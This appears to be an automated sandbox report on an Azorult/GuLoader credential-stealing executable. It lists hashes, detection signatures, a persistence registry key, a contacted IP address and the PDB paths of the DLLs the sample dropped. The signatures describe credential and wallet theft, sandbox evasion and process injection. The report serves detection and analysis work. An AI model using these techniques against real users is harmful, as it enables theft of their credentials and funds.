Windows Analysis Report
Swift Mesaj#U0131#09971.exe

Overview

General Information

Sample Name: Swift Mesaj#U0131#09971.exe
Analysis ID: 755179
MD5: 310df09294b852bab67e158d95788150
SHA1: 9b69175fcbcc718212d21a77d39969309e9787f8
SHA256: d27bf1156e1a463ebada17bac3b3a314835cead7e75c4770c95ff21f06e00310
Infos:

Detection

Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Self deletion via cmd or bat file
Tries to harvest and steal ftp login credentials
Tries to harvest and steal Bitcoin Wallet information
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

barindex
Source: Swift Mesaj#U0131#09971.exe Virustotal: Detection: 10% Perma Link
Source: Swift Mesaj#U0131#09971.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\Fouragen Jump to behavior
Source: unknown HTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49834 version: TLS 1.2
Source: Swift Mesaj#U0131#09971.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984985942.000000001DD18000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019860859.000000001E6E8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988349897.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020557418.000000001E704000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988556068.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964990945.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7966613204.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015801612.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015896144.000000001E660000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.4.dr
Source: Binary string: ucrtbase.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011268620.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8008974466.000000001E830000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019677898.000000001E6D8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019579766.000000001E6D4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981695416.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988556068.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019253907.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976764480.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019579766.000000001E6D4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981695416.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7973403016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7974385257.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964033774.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015801612.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7987166435.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988457162.000000001DD24000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: msvcp140.i386.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7975695387.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011268620.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8008974466.000000001E830000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
